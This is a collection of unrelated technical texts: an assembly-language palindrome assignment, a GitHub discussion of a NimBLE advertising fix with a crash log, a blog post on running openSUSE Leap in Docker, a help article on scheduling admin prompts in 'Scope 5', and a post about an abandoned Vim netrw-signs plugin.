CIS 21JA - Assignment 8 In addition to covering string instructions and 2D arrays, this last lab also reviews concepts that are covered this quarter. Class notes from earlier modules can be helpful. Overview Write a program that stores user input strings in a 2D array. Then the program tells the user whether a specified string is a palindrome. A palindrome is a string that reads the same forward and backward. (Here's a humorous view of a palindrome) Requirements Here are the ordered steps to complete your program: 1. Create 2 constants called ROW and COL that specify the size of the 2D array. · Set ROW to 4, COL to 20 · Make sure ROW and COL are constants (not memory variables), and define them at the top of the program so they're easily found. To test your program you will set these 2 constants to different values, so the easier it is to find them, the faster you can test. 2. Write a macro that accepts an integer as input, and then prints the integer followed by a space character. 3. In the .data section, define a 2D array with ROW and COL size. Make sure you use ROW and COL to define the array, don't use immediate values (literal constants) like 3 or 5. During testing, when you set ROW and COL to different values, the 2D array should change size accordingly and your code should change behavior accordingly. Below is an example of a 2D array with ROW = 3, COL = 10, filled with 2 strings: "21JA" and "123454321" 2 1 J A 0 0 0 0 0 0 1 2 3 4 5 4 3 2 1 0 0 0 0 0 0 0 0 0 0 0 Other than the 2D array and text strings, the .data section should not contain any other memory variable. 4. Write the main procedure that does 2 tasks: A. Call a fillArray procedure that uses the stack to pass data. 1. Pass to it the 2D array and any necessary text string addresses 2. Receive a return value which is the number of text strings that are in the array (the return value is 2 for the example array above) B. Loop to ask the user to select a string from the array and print whether the string is a palindrome or not. 1. The user can keep selecting a string location (a number) until -1 is entered 2. Check that the string location is within the valid number of strings or keep prompting (see sample output below) 3. When the user selection is valid, call the checkString procedure: a. Use the stack to pass to it the 2D array, the number of strings, and the user selection b. Receive a return value of 1 (palindrome) or 0 (not a palindrome) 4. Based on the return value, main prints the appropriate text. 5. Write the fillArray procedure · Loop to ask for a string and store it in the next available row of the array. You can assume the user will enter a string that is shorter than the COL number. · Stop the loop when one of these conditions occurs: · when all rows of the array are filled, or, · when the user chooses to stop by hitting the enter key only · When the loop to input strings is done, call a printArray procedure that uses registers to pass data. · Pass to it the 2D array, the number of strings in the array, and any necessary text string addresses · See the sample output for how the array is printed 6. Write the printArray procedure · print a header line (see sample output below) · for each string, print a number and a space (use the macro), and then print the string. Numbering starts at 1 and increments. 7. Write the checkString procedure · Use the input parameters (2D array and user input number) to get to the correct string · Use string instructions to check if the string is palindrome. · Return 1 for palindrome, 0 for not a palindrome Testing Here are the test cases I will run with your program: · change ROW and COL · strings that are: not palindrome, palindrome with even string length, palindrome with odd string length · try to enter more strings than ROW · enter invalid string number Sample output Enter text string: 12321 Enter text string: abc Enter text string: noon Enter text string: List of strings 1 12321 2 abc 3 noon Enter string number (-1 to end): 0 Enter string number (-1 to end): -2 Enter string number (-1 to end): 1 Palindrome Enter string number (-1 to end): 2 Not a palindrome Enter string number (-1 to end): 3 Palindrome Enter string number (-1 to end): 4 Enter string number (-1 to end): -1 Press any key to continue . . . Additional reminders - Use string instructions when you need to walk a string and access data. - Procedures should pass data through the stack or through registers as required. - Except for main, no other procedure should directly access data defined in .data. - Other than the 2D array and text strings, you should not use any other memory variables in .data
|
OPCFW_CODE
|
Re-run ext adv after completion (IDFGH-9373)
Both extended and normal advertising should be reran when complete in this Nimble example. Without this, only a single BLE client is able to connect when CONFIG_EXAMPLE_EXTENDED_ADV=1
sha=35926387738ba28c0c84d29c6e803ed15c5a8ae7
Hi @kevinhikaruevans ,
I found some issue with the patch. If connection was success , for extended adv , adv complete event is posted by stack. If we restart the ext adv here, then when the connection is disconnected, it will again try to restart ext_adv as it will invoke ext_bleprph_advertise in original code. . This results in crash since the previous instance of ext adv was already started by the new function call introduced in this patch. This may need more handling , i can check later. Have you not observed any issue in your testing ?
`I (595) NimBLE_BLE_PRPH: BLE Host Task Started
I (605) NimBLE: Device Address:
I (605) NimBLE: 60:55:f9:f6:05:4a
I (615) NimBLE:
I (625) uart: queue free spaces: 8
I (635) main_task: Returned from app_main()
I (5075) NimBLE: connection established; status=0
I (5075) NimBLE: handle=1 our_ota_addr_type=0 our_ota_addr=
I (5085) NimBLE: 60:55:f9:f6:05:4a
I (5085) NimBLE: our_id_addr_type=0 our_id_addr=
I (5095) NimBLE: 60:55:f9:f6:05:4a
I (5095) NimBLE: peer_ota_addr_type=1 peer_ota_addr=
I (5105) NimBLE: 45:40:e1:10:0f:73
I (5105) NimBLE: peer_id_addr_type=1 peer_id_addr=
I (5115) NimBLE: 45:40:e1:10:0f:73
I (5115) NimBLE: conn_itvl=36 conn_latency=0 supervision_timeout=500 encrypted=0 authenticated=0 bonded=0
I (5125) NimBLE:
I (5135) NimBLE: advertise complete; reason=0
I (7035) NimBLE: encryption change event; status=1292
I (7035) NimBLE: handle=1 our_ota_addr_type=0 our_ota_addr=
I (7045) NimBLE: 60:55:f9:f6:05:4a
I (7045) NimBLE: our_id_addr_type=0 our_id_addr=
I (7045) NimBLE: 60:55:f9:f6:05:4a
I (7055) NimBLE: peer_ota_addr_type=1 peer_ota_addr=
I (7055) NimBLE: 45:40:e1:10:0f:73
I (7065) NimBLE: peer_id_addr_type=1 peer_id_addr=
I (7065) NimBLE: 45:40:e1:10:0f:73
I (7075) NimBLE: conn_itvl=36 conn_latency=0 supervision_timeout=500 encrypted=0 authenticated=0 bonded=0
I (7085) NimBLE:
I (10055) NimBLE: disconnect; reason=531
I (10055) NimBLE: handle=1 our_ota_addr_type=0 our_ota_addr=
I (10055) NimBLE: 60:55:f9:f6:05:4a
I (10055) NimBLE: our_id_addr_type=0 our_id_addr=
I (10065) NimBLE: 60:55:f9:f6:05:4a
I (10065) NimBLE: peer_ota_addr_type=1 peer_ota_addr=
I (10075) NimBLE: 45:40:e1:10:0f:73
I (10075) NimBLE: peer_id_addr_type=1 peer_id_addr=
I (10085) NimBLE: 45:40:e1:10:0f:73
I (10085) NimBLE: conn_itvl=36 conn_latency=0 supervision_timeout=500 encrypted=0 authenticated=0 bonded=0
I (10095) NimBLE:
assert failed: ext_bleprph_advertise main.c:116 (rc == 0)
Stack dump detected
Core 0 register dump:
MEPC : 0x408005fa RA : 0x4080919a SP : 0x4081b6c0 GP : 0x4080edf0
0x408005fa: panic_abort at /esp-idf/components/esp_system/panic.c:452
0x4080919a: __ubsan_include at /esp-idf/components/esp_system/ubsan.c:313
TP : 0x40804eec T0 : 0x37363534 T1 : 0x7271706f T2 : 0x33323130
0x40804eec: ble_lll_sched_insert_after at ??:?
MHARTID : 0x00000000
Backtrace:
panic_abort (details=details@entry=0x4081b6fc "assert failed: ext_bleprph_advertise main.c:116 (rc == 0)") at /esp-idf/components/esp_system/panic.c:452
452 *((volatile int *) 0) = 0; // NOLINT(clang-analyzer-core.NullDereference) should be an invalid operation on targets
#0 panic_abort (details=details@entry=0x4081b6fc "assert failed: ext_bleprph_advertise main.c:116 (rc == 0)") at /esp-idf/components/esp_system/panic.c:452
#1 0x4080919a in esp_system_abort (details=details@entry=0x4081b6fc "assert failed: ext_bleprph_advertise main.c:116 (rc == 0)") at /esp-idf/components/esp_system/port/esp_system_chip.c:77
#2 0x4080d4e6 in __assert_func (file=file@entry=0x420635ed "", line=line@entry=116, func=, func@entry=0x42063be4 <func.2> "", expr=expr@entry=0x420635dc "") at /esp-idf/components/newlib/assert.c:81
#3 0x42006cb4 in ext_bleprph_advertise () at ../main/main.c:116
#4 0x42006f10 in bleprph_gap_event (event=0x4081b8a0, event@entry=, arg=) at ../main/main.c:308
`
Hi @rahult-github, I see the crash now. I was previously checking if the device was busy in ext_bleprph_advertise, but this is probably not a good way to handle this.
Just wondering, are you able to run multiple ble clients with ext adv without the patch?
Hi @kevinhikaruevans ,
Please help check if attached patch works for you
0001-Nimble-Updated-bleprph-example-to-enable-ext-adv-aft.txt
@rahult-github Thank you! Yes, that patch worked for me. I've updated the PR with that patch.
sha=0b921fda149c69510258ba879e34cbeb1829cce0
Hi @kevinhikaruevans ,
I have below suggestions:
Can you please merge the two commits and make one. You can have the commit in your name as contributor.
Please rebase to latest master
Hi @rahult-github
I've squashed the two commits
I've rebased the branch with master
Changes part of master tree . Thanks for your contribution.
|
GITHUB_ARCHIVE
|
I wanted to try an OpenSUSE Leap installation, just needed the shell not some GUI. My first choice in this kind of situation is to install a distro in VM. I was hearing a lot about docker and I said to myself, why not try a docker instead of VM.
First thing that came to my mind was – wait, can docker even run another linux distro? You know, docker images share kernel and I want to run another distro thus another kernel, this is job for virtualization.
I quickly discovered that you can run another linux distro in docker. Why? Well that’s easy. Every linux distro share the same kernel under the hood. Kernels ABI is usually pretty compatible across different versions.
I guess that all apps are just fine as long as they or better say their libs use syscalls that are available in the host kernel.
Now that we all know that docker can run linux distro let’s actually do that.
I’m running OpenSUSE Tumbleweed. It is a rolling-release distro so the steps may change a bit in future, but I think they will apply for at least some years to come.
sudo zypper install docker docker-compose
Add yourself to docker group so you can use it without sudo
sudo usermod -a -G docker your_name
Docker uses a dockerd daemon in the system, it should be running to use docker. Start it with systemctl
sudo systemctl start docker
To have docker auto start on boot enable it
sudo systemctl enable docker
You can check the whole config using
sudo systemctl status docker
● docker.service - Docker Application Container Engine
Loaded: loaded (/usr/lib/systemd/system/docker.service; enabled; vendor preset: disabled)
Active: active (running) since Sun 2019-01-20 17:45:22 CET; 3h 41min ago
Main PID: 1343 (dockerd)
├─1343 /usr/bin/dockerd --add-runtime oci=/usr/sbin/docker-runc
└─1389 docker-containerd --config /var/run/docker/containerd/containerd.toml --log-level info
Search for the image you want
docker search opensuse
Download the image you want
docker pull opensuse/leap
This will download the latest version of that image, you can specify TAG, but let’s write about that in future post.
Check your installed images
REPOSITORY TAG IMAGE ID CREATED SIZE
opensuse/leap latest bb77bd72ae3d 3 days ago 102MB
You can see the TAG here.
And now – run it
docker run -i -t opensuse/leap /bin/bash
You can check the params help later with
docker help run
Now you are in your new leap. You can look around, do stuff … . I was really curious about the ps aux command, you can try it too. It shows the compactness of containers.
Exit the image using CTRL+D or just type exit. You can now check the help for run or just check another command that list docker containers.
docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
3d3fd74d0748 opensuse/leap "/bin/bash" 2 hours ago Exited (0) About an hour ago kind_khorana
To attach to the container you have to first start it
docker start 3d3fd74d0748
Then attach to it
docker attach 3d3fd74d0748
After you are done with your container you can just delete it
docker rm 3d3fd74d0748
This will delete the container only, not the image. You can check both with commands before. You can run another container of the image anytime you want.
And that is it. So far docker seems very nice.
In another post I will try to run web server in my container so don’t forget to check it how it will turn out.
|
OPCFW_CODE
|
In this article, we'll explain how to create admin prompts to be sent to responsible admins. First, let's discuss the relationship between admins and admin prompts.
The Relationship Between Admins and Admin Prompts
Each admin can be subject to one admin prompt at a time. Each admin prompt can be attached to multiple admins. This concept is illustrated by the following example.
Let's assume that we have a report that's due on the last day of each quarter. In order to produce that report, we need up-to-date data from a set of 30 trackers. The first step is to assign a set of admins to be responsible for the 30 trackers. (This process is described in the article Tracker Responsibilities). We distribute responsibility for the 30 trackers between 3 admins.
Next, we create a single admin prompt configured for a cycle that recurs quarterly (with the first cycle culminating in the last day of the current quarter and subsequent cycles culminating in the last day of subsequent quarters). We then attach that prompt to the three admins that between them, have responsibility for the 30 trackers that we need for our report.
Admin prompts can be deleted when they are no longer needed. New admin prompts can be created and assigned to any set of admins at any time.
Conditions Under Which Prompts are Sent
In previous paragraphs, we described attaching a quarterly prompt to a set of three admins. In order for each of these admins to actually receive prompt emails, two conditions must be met:
- The admin must be responsible for one or more trackers.
- At least one of the trackers for which the admin is responsible must be in need of maintenance. Maintenance is needed when there are concerns regarding the tracker's data that elicit warnings or that cause the tracker to be excluded.
Admin Prompt Attributes
Admin prompts have several configurable attributes that control their operation. In this section, we'll look at each of those attributes in detail. First, we'll look at attributes that control the timing at which prompts are sent.
(We'll illustrate the prompt attributes with a screenshot of the actual prompt configuration form from the Scope 5 application. At the end of this section, we'll explain how to access the form).
The Prompt Cycle (Send prompts)
We introduced the concept of a recurring prompt cycle in the article Getting Your Data in Time for Reporting. Available prompt cycles include monthly, bi-monthly, quarterly, semi-annually and annually. In addition, a special case allows for a one-time prompt.
The Prompt Due Date (before)
Each prompt is configured around a certain due date. The due date is the date by which up-to-date data is required. Due dates recur at the periodicity of the prompt cycle. In keeping with the example above, a quarterly prompt might be configured for a date of June 30th 2019. This would be the first cycle's due date. Subsequent cycle due date's would then be September 30th, 2019, December 31st 2019, March 31st 2020 and so on (until the prompt is deleted).
The screenshot below illustrates these two attributes (highlighted in the red frames) with the corresponding values configured.
Advance Notice (starting N weeks)
Another important attribute of an admin prompt is the advance notice. This can also be thought of as the 'prep-time' that the responsible admins are expected to need in order to have their trackers updated by the cycle's due date. In the screenshot illustrated above, the admin prompt is configured to start prompting two weeks before each cycle's due date.
The last attribute of the admin prompt that is related to the timing of sent prompts, is the frequency at which reminders should be sent whilst in the advance notice phase of a prompt cycle. In the example illustrated, the prompt is configured to send reminders to admins daily until either the cycle is over or the admin's trackers are made up-to-date. Additional options for the remind attribute include every-other day or weekly.
Recall that in order for prompts to be sent to an admin, one or more of the trackers for which the admin is responsible must require maintenance. There are two thresholds of maintenance that may be required - trackers may have warnings (which means that they require relatively minor maintenance) or they may be excluded (which means that they require more substantial maintenance).
The radio buttons illustrated in the screenshot above (following the 'Prompt for' label) determine the threshold of required maintenance that will trigger a prompt to be sent. In this example, prompts will be sent to an admin only if the set of trackers for which they are responsible includes excluded trackers. Being responsible for trackers that are merely warning will not trigger a prompt.
The last configurable attribute is the option to copy the account manager scheduling the prompt on each sent prompt. Note that if the prompt is attached to a large set of admins, the scheduling admin must be prepared to be copied on a large set of emails.
Configuring Admin Prompts
The admin prompt configuration form illustrated above is accessible to select admins via the Manage Admins sidenav under the Admins tab. On this page, you will find a listing of the account admins, with the option to schedule prompts using the button illustrated below (highlighted in red):
Prompts can be configured (or scheduled) for multiple admins at a time. To schedule prompts for a set of admins, select those admins using the checkboxes in the leftmost column of the Admin Management table, then click the Schedule Prompts button. This will bring up the admin prompt configuration form.
More on the Prompt Cycle and the Prompted Admin's Experience
In this section we'll take a deeper look at the prompt cycle and the responsible admin's experience at different phases of the cycle.
Phases of the Prompt Cycle
As explained previously, each admin prompt operates on a prompt cycle. The cycle is driven by a recurring due date. Each cycle starts some number of weeks (the advance notice or prep period) before the due date.
After each cycle starts with the sending of the first set of prompts, the cycle is active until the cycle's due date. During this time, admins will receive prompts (at a rate determined by the remind attribute) so long as trackers for which they are responsible need maintenance. Once the cycle's due date is reached, prompts will cease to be sent until the time is reached to send prompts in advance of the next cycle's due date. (This is referred to as the immunity zone in the diagram below).
These phases are illustrated below for several different prompt configurations. The attributes identified in the box at the top of each scenario correspond to the prompt timing attributes discussed earlier in this article.
If an admin is responsible for trackers that need maintenance, then that admin will be locked out of the standard Scope 5 user environment until all his or her trackers have been brought up-to-date. During this time, they will be presented with the familiar Data Provider interface. This is a minimalist interface, designed to focus the admin on updating the set of trackers needing maintenance.
|
OPCFW_CODE
|
In this post I’m going to aim for an MVP that may not be the most usable but can serve as a proof of concept. This version will only run when you call a command and have minimal configuration. Polishing of the plugin will come after in the form of help pages, configuration and automatic execution.
The very first step involves creating the main plugin file which is loaded from the runtime path and defines commands, automatic as well as normal. These commands will point to a namespaced file which will be loaded on demand, this is all contained within the
The initial files
plugin/netrw_signs.vim, which points to an autoload function.
command! NetrwSigns :call netrw_signs#SignBuffer()
Then we can create the “Hello, World!” function on the other end of this command in
echo "Hello, World!"
After adding the project directory to my runtime path (
set rtp+=$HOME/.../vim-netrw-signs in
~/.vimrc) I can open Vim and execute
:NetrwSigns to run my new function. This prints “Hello, World!” to the bottom of my screen. Obviously the plugin still lacks a fair bit of functionality.
I will also add a way to fetch the version number, as I did with vim-enmasse.
command! NetrwSignsVersion :echo netrw_signs#GetVersion()
Next, we must build an implementation behind the
SignBuffer function, so that involves building the entire thing. No big deal. But first, let’s test this stupidly simple version function in
Before (set up regular expression):
let versionRegExp = '\v\d+.\d+.\d+'
Execute (can print the version number with the command):
redir => messages
let result = get(split(messages, "\n"), -1, "")
Assert result =~# versionRegExp
Execute (can get the version number with the function):
Assert netrw_signs#GetVersion() =~# versionRegExp
I also had to add my project folder to my runtime path to get this to work in
vim -Nu <(cat << EOF
set rtp+=. <-- This thing.
filetype plugin indent on
EOF) +Vader tests/*.vader
High level testing
I’m going to use my tests to define how the plugin will actually work. Some may say that I’m driving my development with tests. These will be high level but provide me with all the checks I need to make sure my basic configuration is actually producing the desired results and signs. One of the best things about writing the tests up front is that my configuration will be thought out in a way that makes sense from the users perspective, I’ll then work back from there.
Here’s my preliminary configuration I’ll be using in my root high level tests. Below it is my thought process in pseudo-English.
\'error': 'text=>> texthl=ErrorMsg'
\'warning': 'text=>> texthl=WarningMsg'
Let the check contains-hyphen use the function ContainsHyphen.
Let the check contains-upper-case use the function ContainsUpperCase.
Let the error sign have these arguments passed to it's definition within Vim.
Let the warning sign have these arguments passed to it's definition within Vim.
Let the contains-hyphen check show the error sign if it returns true.
Let the contains-upper-case check show the warning sign if it returns true.
As far as I can tell so far, this is all the logic I will need to configure the plugin. This should allow the user more than enough power, it will even allow you to hook into git, which is my end goal. The one thing I’m not so sure about right now is how I’ll execute the functions by name reliably. It should “just work”, but I may encounter some problems with that later on. I also need to work out the format for the check functions return values.
My current thinking is for each check function to either get called once with each line of the netrw buffer or, alternatively, to pass an array of all lines to the function. The function would then run a map over that array and return an array of booleans. The one line approach allows for simple functions and the heavy lifting on my end (probably involving maps), the other approach involves heavier check functions but the chance for optimisations if you had to call
git status for every line, for example.
With those implementation details in mind, I’ll write my first tests against this configuration.
It is at this point that I realised how much work will actually be involved to get a working and tested MVP that didn’t die when it encountered tiny changes in netrw configuration. I don’t have time for this sort of return on investment, so I’m shelving this little project to learn about Clojure and algorithms using this stack of books I’ve accumulated. I’m obviously going to push everything I’ve got so far alongside these few posts, and I may even come back to it one day. Until then, sorry vim-netrw-signs, you’re dead to me.
|
OPCFW_CODE
|